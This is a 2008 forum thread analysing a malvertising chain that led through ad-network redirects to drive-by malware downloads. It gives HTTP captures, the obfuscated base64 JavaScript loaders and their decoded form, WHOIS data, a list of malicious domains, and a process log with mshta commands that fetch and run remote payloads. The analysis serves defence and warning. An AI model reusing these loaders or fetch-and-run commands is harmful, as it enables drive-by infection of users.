Help - Search - Members - Calendar
Full Version: Malicious Advertising
B.I.S.S. Forums > Malware News , Research & Removal > Malware Playground
Kimberly
Mar 4 2008, 07:21 PM
xrun.exe was reported to be seen on ebaumworld.com but unfortunately I didn’t get the file while visiting the website. I got curious because usually you get that file on crack sites. After starting up my VM, I headed to a well-known crack site. Surprise surprise, it’s trigged by an advertising banner so you might run into this one on different websites.

We will see later on that xrun.exe isn’t the only exploit. I actually got 3 alerts.
IPB Image
IPB Image
IPB Image
Don’t follow the links in the write-up or you will end up with a ton load of malware on your PC.

Tracing back the origin of the file


I worked backwards to find back it's origin using the referer headers in the packets but it will be far more comprehensive if we start with the initial advert.

It all begins with a placeholder for ads.clicksor.com adverts.
hxxp://ads.clicksor.com/serving/flash/160x600.swf – Nothing special because it’s simply a black placeholder for random adverts.

IPB Image
Once unpacked, we can take a look at the SWF file with Flare. Inside you can see the following function which displays the random banners:

CODE
function displayBannerAd(cid, kid, nid, pnid, url, cdata, mtype, cpx, adWidth, adHeight, adType, bannerID, pid, sid, ch, uid) {
      if (cid == '-1' && kid == '-1') {
        getURL(url, '_self');
        return undefined;
      } else {
        if ((cpx == 'cpm' || cpx == 'cpa') && mtype == 'rich') {
          getURL('http://ads' + ((pnid != 1) ? pnid : '') + '.clicksor.com/serving/showRichAd.php?cid=' + cid + '&kid=' + kid + '&nid=' + nid + '&mtype=' + mtype + '&cpx=' + cpx + '&adType=' + adType + '&bannerID=' + bannerID + '&pid=' + pid + '&sid=' + sid + '&ch=' + ch + '&uid=' + uid, '_self');
          return undefined;
        } else {
          var container = createEmptyMovieClip('container', getNextHighestDepth());
          var v2 = new MovieClipLoader();
          this.onloadInit = function (mc) {
            mc.onRelease = function () {
              getURL(url, '_blank');
            };

            container._width = adWidth;
            container._height = adHeight;
          };

          v2.addListener(this);
          v2.loadClip(cdata, container);
        }
      }
    }

showRichAd.php is called with several arguments. They determine the advertisement that needs to be displayed.

CODE
GET /serving/showRichAd.php?cid=46821&kid=3605363&nid=1&mtype=rich&cpx=cpm&adType=5&bannerID=55706&pid=61989&sid=124442&ch=undefined&uid=1024551843 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ads.clicksor.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 04 Mar 2008 15:03:33 GMT
Server: Apache/2.2.3 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: CLICKSORUID=1204643013952; expires=Thu, 03-Apr-2008 15:03:33 GMT; path=/; domain=.clicksor.com
Content-Length: 207
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML><BODY leftmargin=0 topmargin=0><iframe src="http://creative.clicksor.com/46821/c1032706034.html" FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO width="160" height="600"></iframe></BODY></HTML>

CODE
GET /46821/c1032706034.html HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ads.clicksor.com/serving/showRichAd.php?cid=46821&kid=3605363&nid=1&mtype=rich&cpx=cpm&adType=5&bannerID=55706&pid=61989&sid=124442&ch=undefined&uid=1024551843
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: creative.clicksor.com
Connection: Keep-Alive
Cookie: CLICKSORUID=1204643013952
HTTP/1.1 200 OK
Date: Tue, 04 Mar 2008 15:03:34 GMT
Server: Apache/2.0.54 (Fedora)
Last-Modified: Mon, 25 Sep 2006 14:19:20 GMT
ETag: "df51f1-111-e0362a00"
Accept-Ranges: bytes
Content-Length: 273
Connection: close
Content-Type: text/html; charset=UTF-8
<html><head><title>AD</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></head><body topmargin="0" leftmargin="0">
........<script language="javascript" src="http://especialads.com/banner/serve.php?sv=160x600"></script>
........</body></html>

CODE
GET /banner/serve.php?sv=160x600 HTTP/1.1
Accept: */*
Referer: http://creative.clicksor.com/46821/c1032706034.html
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: especialads.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 04 Mar 2008 15:03:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Expires: Mon, 01 Jul 2000 01:00:00 GMT
Pragma: no-cache
P3P: href="http://especialads.com/w3c/p3p.xml", CP="ad policy", policyref="http://especialads.com/w3c/p3p.xml"
Content-Length: 945
Connection: close
Content-Type: text/html; charset=UTF-8
var awefjwefo = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
function waofls(odkqwp) { var bits; var wqodfkpa = ''; var i = 0; for(; i<odkqwp.length; i += 4) { bits = (awefjwefo.indexOf(odkqwp.charAt(i)) & 0xff) <<18 | (awefjwefo.indexOf(odkqwp.charAt(i +1)) & 0xff) <<12 | (awefjwefo.indexOf(odkqwp.charAt(i +2)) & 0xff) << 6 | awefjwefo.indexOf(odkqwp.charAt(i +3)) & 0xff; wqodfkpa += String.fromCharCode((bits & 0xff0000) >>16, (bits & 0xff00) >>8, bits & 0xff); } if(odkqwp.charCodeAt(i -2) == 61) { return(wqodfkpa.substring(0, wqodfkpa.length -2)); } else if(odkqwp.charCodeAt(i -1) == 61) { return(wqodfkpa.substring(0, wqodfkpa.length -1)); } else {return(wqodfkpa)};}
document.write(waofls(unescape(' DQo8c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0Ij4NCmRvY3VtZW50LmxvY2F0aW9uLmhyZWYgPSAi
aHR0cDovL2VzcGVjaWFsYWRzLmNvbS9iYW5uZXIvc2hvdy5waHA/Y2lkPTExMzI0MjYmdGlkPTQ1MDExMDEzOTUmc3Y9MTYweDYwMCI7DQo8L3NjcmlwdD4NCg0K')));

Once decrypted, the code above gives us the next location:

CODE
<script language="javascript">
document.location.href = "http://especialads.com/banner/show.php?cid=1132426&tid=4501101395&sv=160x600";
</script>

CODE
GET /banner/show.php?cid=1132426&tid=4501101395&sv=160x600 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ads.clicksor.com/serving/showRichAd.php?cid=46821&kid=3605363&nid=1&mtype=rich&cpx=cpm&adType=5&bannerID=55706&pid=61989&sid=124442&ch=undefined&uid=1024551843
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: especialads.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 04 Mar 2008 15:03:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Expires: Mon, 01 Jul 2000 01:00:00 GMT
Pragma: no-cache
P3P: href="http://especialads.com/w3c/p3p.xml", CP="ad policy", policyref="http://especialads.com/w3c/p3p.xml"
Set-Cookie: ebannsetc=1204643014; expires=Tue, 25-Mar-2008 15:03:34 GMT
Content-Length: 1484
Connection: close
Content-Type: text/html; charset=UTF-8
<script language="javascript">
var awefjwefo = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
function waofls(odkqwp) { var bits; var wqodfkpa = ''; var i = 0; for(; i<odkqwp.length; i += 4) { bits = (awefjwefo.indexOf(odkqwp.charAt(i)) & 0xff) <<18 | (awefjwefo.indexOf(odkqwp.charAt(i +1)) & 0xff) <<12 | (awefjwefo.indexOf(odkqwp.charAt(i +2)) & 0xff) << 6 | awefjwefo.indexOf(odkqwp.charAt(i +3)) & 0xff; wqodfkpa += String.fromCharCode((bits & 0xff0000) >>16, (bits & 0xff00) >>8, bits & 0xff); } if(odkqwp.charCodeAt(i -2) == 61) { return(wqodfkpa.substring(0, wqodfkpa.length -2)); } else if(odkqwp.charCodeAt(i -1) == 61) { return(wqodfkpa.substring(0, wqodfkpa.length -1)); } else {return(wqodfkpa)};}
document.write(waofls(unescape(' DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPiBib2R5IHsgbWFyZ2luLWxlZnQ6IDBweDsgbWFyZ2luLXRv
cDogMHB4OyBtYXJnaW4tcmlnaHQ6IDBweDsgbWFyZ2luLWJvdHRvbTogMHB4OyB9IDwvc3R5bGU+PGJv
ZHkgc2Nyb2xsPSJubyI+DQoNCjxhIGhyZWY9Imh0dHA6Ly9jbGljay5saW5rc3luZXJneS5jb20vZnMt
YmluL2NsaWNrP2lkPU9neGNKMDdHZnEwJm9mZmVyaWQ9MTEyOTYzLjEwMDAwMDA3JnN1YmlkPTAmdHlw
ZT00IiB0YXJnZXQ9Il9ibGFuayI+PElNRyBib3JkZXI9IjAiIGFsdD0iOHg4LCBJbmMuIiBzcmM9Imh0
dHA6Ly9hZC5saW5rc3luZXJneS5jb20vZnMtYmluL3Nob3c/ aWQ9T2d4Y0owN0dmcTAmYmlkcz0xMTI5NjMuMTAwMDAwMDcmc3ViaWQ9MCZ0eXBlPTQmZ3JpZG51bT05
Ij48L2E+DQoNCg0KDQoNCg0KPHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCIgc3JjPSJodHRwOi8v
d3d3LmF3b2Zrd3kubmV0L3BsYWNlaG9sZGVyLTEzNTQ1MDAtMTkyOTA0NDQxOCI+PC9zY3JpcHQ+DQoN
Cg0KDQoNCg0K')));
</script>

Decoded:

CODE
<style type="text/css"> body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; } </style><body scroll="no">
<a href="http://click.linksynergy.com/fs-bin/click?id=OgxcJ07Gfq0&offerid=112963.10000007&subid=0&type=4" target="_blank"><IMG border="0" alt="8x8, Inc." src="http://ad.linksynergy.com/fs-bin/show?id=OgxcJ07Gfq0&bids=112963.10000007&subid=0&type=4&gridnum=9"></a>
<script language="javascript" src="http://www.awofkwy.net/placeholder-1354500-1929044418"></script>

The ad.linksynergy.com link will show us the advert image (see below), but right now we are only interested by the www.awofkwy.net/placeholder-1354500-1929044418 link. From here on I will only post screenshots of the code to avoid trouble.

IPB Image

Decoded:

IPB Image

First iframe ...

IPB Image

There are still encoded parts - see Unescape in the text - they are references to ADOBE.Stream ActiveX controls. The most interesting part are the 2 links to our malware files.

IPB Image

The second iframe ...

IPB Image

The script is rather long, I took only a snipit. We find mshta & srun.php back here. At the bottom again links to xrun.exe and xpre.exe.

IPB Image

Third iframe ...

IPB Image

Java exploit ... the code is very long, so I will only post 2 snipits that show the links.

IPB Image

Advertising image:

IPB Image

especialads.com - 83.216.217.242


ICANN Registrar: ENOM, INC.
Created: 2006-07-16
Expires: 2008-07-16

Name Server: DNS1.NAME-SERVICES.COM (has 4,321,272 domains)
Name Server: DNS2.NAME-SERVICES.COM
Name Server: DNS3.NAME-SERVICES.COM
Name Server: DNS4.NAME-SERVICES.COM
Name Server: DNS5.NAME-SERVICES.COM
Whois Server: whois.enom.com

Server Type: Apache/2.2.3 (CentOS)
IP Location - Niederosterreich - Baden - Colobase Customer Allocation

Registration Service Provided By: Namealerts, LLC
Contact:
Visit: http://www.Namealerts.com

Domain name: especialads.com

Registrant Contact:

Marcel Heler ()
436641774176
Fax: 436641774176
Braeuhausgasse 31/31
Vienna, 1050
AT

Administrative Contact:

Marcel Heler ()
436641774176
Fax: 436641774176
Braeuhausgasse 31/31
Vienna, 1050
AT

Technical Contact:

Marcel Heler ()
436641774176
Fax: 436641774176
Braeuhausgasse 31/31
Vienna, 1050
AT

Status: Locked

Name Servers:
dns1.name-services.com
dns2.name-services.com
dns3.name-services.com
dns4.name-services.com
dns5.name-services.com

Creation date: 16 Jul 2006 19:39:22
Expiration date: 16 Jul 2008 19:39:22

Websites.
  1. Adoutfer.net
  2. Adpopserve.net
  3. Adpopshow.net
  4. Adpopups.net
  5. Adxanet.net
  6. Adxrnet.net
  7. Awofkwy.net
  8. Especialads.com
  9. Iefjios.net
  10. Kasdfps.net
  11. Kiafjwo.net
  12. Netaddirect.com
  13. Netcrefer.net
  14. Netcshow.net
  15. Netsdir.net
  16. Snipenet.net
  17. Snipernet.biz
  18. Snipernet.us
  19. Sxload.net
  20. Xpseek.net
Kimberly
Mar 6 2008, 11:17 PM
QUOTE(Kimberly @ Mar 4 2008, 08:21 PM) *
Don’t follow the links in the write-up or you will end up with a ton load of malware on your PC.
Speaking of junk .... diablo.gif
QUOTE
---Process Guard Log Started---

Thu 06 - 22:31:59 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xrun.exe" was allowed to run
[EXECUTION] Started by "c:\program files\internet explorer\iexplore.exe" [1444]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xrun.exe" ]
Thu 06 - 22:32:19 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xpre.exe" was allowed to run
[EXECUTION] Started by "c:\program files\internet explorer\iexplore.exe" [1444]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xpre.exe" ]
Thu 06 - 22:32:20 [TERMINATE] c:\docume~1\kly\locals~1\temp\xpre.exe [288] was blocked from terminating c:\program files\common files\symantec shared\ccapp.exe [428]
Thu 06 - 22:32:20 [TERMINATE] c:\docume~1\kly\locals~1\temp\xpre.exe [288] was blocked from terminating c:\program files\processguard\procguard.exe [872]
Thu 06 - 22:32:57 [EXECUTION] "c:\windows\system32\mshta.exe" was allowed to run
[EXECUTION] Started by "c:\program files\internet explorer\iexplore.exe" [1444]
[EXECUTION] Commandline - [ "c:\windows\system32\mshta.exe" hxxp://adxanet.net/code/srun.php ]
Thu 06 - 22:33:22 [EXECUTION] "c:\windows\system32\dllhost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [616]
[EXECUTION] Commandline - [ c:\windows\system32\dllhost.exe /processid:{02d4b3f1-fd88-11d1-960d-00805fc79235} ]
Thu 06 - 22:33:29 [EXECUTION] "c:\windows\system32\msdtc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [616]
[EXECUTION] Commandline - [ c:\windows\system32\msdtc.exe ]
Thu 06 - 22:33:40 [EXECUTION] "c:\windows\system32\mshta.exe" was allowed to run
[EXECUTION] Started by "c:\program files\internet explorer\iexplore.exe" [1444]
[EXECUTION] Commandline - [ "c:\windows\system32\mshta.exe" hxxp://adxanet.net/code/srun.php ]
Thu 06 - 22:33:44 [EXECUTION] "c:\windows\system32\mshta.exe" was allowed to run
[EXECUTION] Started by "c:\program files\internet explorer\iexplore.exe" [1444]
[EXECUTION] Commandline - [ "c:\windows\system32\mshta.exe" hxxp://adxanet.net/code/srun.php ]
Thu 06 - 22:37:53 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xrun.exe" [1168]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /c start "" "%tmp%\xpre.exe" ]
Thu 06 - 22:38:08 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xrun.exe" [1168]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /c start "" "%tmp%\snapsnet.exe" ]
Thu 06 - 22:38:14 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xpre.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1104]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xpre.exe" ]
Thu 06 - 22:38:16 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1280]
[EXECUTION] Commandline - [ "c:\windows\explorer.exe" ]
Thu 06 - 22:38:47 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xrun.exe" [1168]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /c start "" "%tmp%\rasesnet.exe" ]
Thu 06 - 22:38:50 [EXECUTION] "c:\docume~1\kly\locals~1\temp\snapsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3728]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:38:57 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3744]
[EXECUTION] Commandline - [ cmd /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xpre.exe" >> nul ]
Thu 06 - 22:39:08 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xrun.exe" [1168]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /c start "" "%tmp%\wavvsnet.exe" ]
Thu 06 - 22:39:12 [EXECUTION] "c:\docume~1\kly\locals~1\temp\rasesnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3312]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:39:35 [EXECUTION] "c:\windows\system32\idlo01\idlo011065.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3340]
[EXECUTION] Commandline - [ c:\windows\system32\idlo01\idlo011065.exe ]
Thu 06 - 22:39:50 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1916]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:40:15 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xrun.exe" [1168]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /c start "" "%tmp%\yazzsnet.exe" ]
Thu 06 - 22:40:18 [EXECUTION] "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1484]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:40:22 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [220]
[EXECUTION] Commandline - [ cmd /c c:\docume~1\kly\locals~1\temp\removalfile.bat "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:40:27 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xpre.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [748]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xpre.exe" ]
Thu 06 - 22:40:31 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xpre.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3168]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xpre.exe" ]
Thu 06 - 22:40:33 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xpre.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3992]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xpre.exe" ]
Thu 06 - 22:40:39 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1168]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xrun.exe" >> nul ]
Thu 06 - 22:41:16 [EXECUTION] "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2516]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" ]
Thu 06 - 22:41:40 [EXECUTION] "c:\temp\txnog4220.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\idlo01\idlo011065.exe" [2252]
[EXECUTION] Commandline - [ c:\temp\txnog4220.exe ]
Thu 06 - 22:41:43 [EXECUTION] "c:\docume~1\kly\locals~1\temp\snapsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [748]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:41:47 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3292]
[EXECUTION] Commandline - [ cmd /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xpre.exe" >> nul ]
Thu 06 - 22:41:50 [EXECUTION] "c:\docume~1\kly\locals~1\temp\snapsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3168]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:41:52 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1216]
[EXECUTION] Commandline - [ cmd /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xpre.exe" >> nul ]
Thu 06 - 22:41:59 [EXECUTION] "c:\docume~1\kly\locals~1\temp\snapsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3992]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:42:01 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2816]
[EXECUTION] Commandline - [ cmd /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xpre.exe" >> nul ]
Thu 06 - 22:42:03 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [3040]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:42:06 [EXECUTION] "c:\windows\system32\mshta.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ mshta hxxp://adxanet.net/code/srun.php ]
Thu 06 - 22:43:08 [EXECUTION] "c:\program files\common files\yazzle1281oinadmin.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" [1248]
[EXECUTION] Commandline - [ "c:\program files\common files\yazzle1281oinadmin.exe" -install -name "yazzle1281" -userid 1281 ]
Thu 06 - 22:43:21 [EXECUTION] "c:\windows\17pholmes572.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" [2640]
[EXECUTION] Commandline - [ "c:\windows\17pholmes572.exe" 61a847b5bbf728173599284503996897c881250221c8670836ac4fa7c8833201749139 ]
Thu 06 - 22:44:02 [EXECUTION] "c:\windows\system32\ev4\philcom3.exe" was allowed to run
[EXECUTION] Started by "c:\temp\txnog4220.exe" [3112]
[EXECUTION] Commandline - [ c:\windows\system32\ev4\philcom3.exe ]
Thu 06 - 22:44:07 [EXECUTION] "c:\windows\system32\idlo01\idlo011065.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2332]
[EXECUTION] Commandline - [ c:\windows\system32\idlo01\idlo011065.exe ]
Thu 06 - 22:44:08 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [3852]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:44:10 [EXECUTION] "c:\windows\system32\idlo01\idlo011065.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1104]
[EXECUTION] Commandline - [ c:\windows\system32\idlo01\idlo011065.exe ]
Thu 06 - 22:44:11 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1256]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:44:14 [EXECUTION] "c:\windows\system32\idlo01\idlo011065.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3940]
[EXECUTION] Commandline - [ c:\windows\system32\idlo01\idlo011065.exe ]
Thu 06 - 22:44:15 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [2268]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:44:35 [EXECUTION] "c:\windows\system32\mshta.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ mshta hxxp://snipenet.net/ads/winfix.php ]
Thu 06 - 22:45:00 [EXECUTION] "c:\docume~1\kly\locals~1\temp\mshtml2.exe" was allowed to run
[EXECUTION] Started by "c:\program files\common files\yazzle1281oinadmin.exe" [3320]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\mshtml2.exe" -vt yazb -pid 5 -rid 99001281 ]
Thu 06 - 22:45:08 [EXECUTION] "c:\docume~1\kly\locals~1\temp\rasesnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3168]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:45:10 [EXECUTION] "c:\docume~1\kly\locals~1\temp\rasesnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3992]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:45:12 [EXECUTION] "c:\docume~1\kly\locals~1\temp\rasesnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [748]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:45:22 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" [2640]
[EXECUTION] Commandline - [ cmd /c ""c:\docume~1\kly\locals~1\temp\un.bat" " ]
Thu 06 - 22:45:28 [EXECUTION] "c:\windows\system32\fb3\rvdll36.exe" was allowed to run
[EXECUTION] Started by "c:\temp\txnog4220.exe" [3112]
[EXECUTION] Commandline - [ c:\windows\system32\fb3\rvdll36.exe ]
Thu 06 - 22:45:37 [EXECUTION] "c:\windows\system32\ev4\philcom3.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\ev4\philcom3.exe" [2372]
[EXECUTION] Commandline - [ c:\windows\system32\ev4\philcom3.exe child ]
Thu 06 - 22:45:50 [EXECUTION] "c:\windows\system32\mshta.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ mshta hxxp://snipenet.net/ads/winavp.php ]
Thu 06 - 22:45:57 [EXECUTION] "c:\docume~1\kly\locals~1\temp\mshtml3.exe" was allowed to run
[EXECUTION] Started by "c:\program files\common files\yazzle1281oinadmin.exe" [3320]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\mshtml3.exe" -vt yazb -pid 5 -rid 99001281 ]
Thu 06 - 22:46:09 [EXECUTION] "c:\windows\downloaded program files\uga6p_0001_n122m2802netinstaller.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3452]
[EXECUTION] Commandline - [ "c:\windows\downloaded program files\uga6p_0001_n122m2802netinstaller.exe" /regserver ]
Thu 06 - 22:46:20 [EXECUTION] "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3168]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:46:26 [EXECUTION] "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3992]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:46:30 [EXECUTION] "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [748]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:46:37 [EXECUTION] "c:\windows\system32\ax9\np89104.exe" was allowed to run
[EXECUTION] Started by "c:\temp\txnog4220.exe" [3112]
[EXECUTION] Commandline - [ c:\windows\system32\ax9\np89104.exe ]
Thu 06 - 22:46:40 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\rasesnet.exe" [1400]
[EXECUTION] Commandline - [ rundll32.exe ,a ]
Thu 06 - 22:46:43 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\rasesnet.exe" [3932]
[EXECUTION] Commandline - [ rundll32.exe ,a ]
Thu 06 - 22:46:47 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\rasesnet.exe" [3308]
[EXECUTION] Commandline - [ rundll32.exe ,a ]
Thu 06 - 22:46:51 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
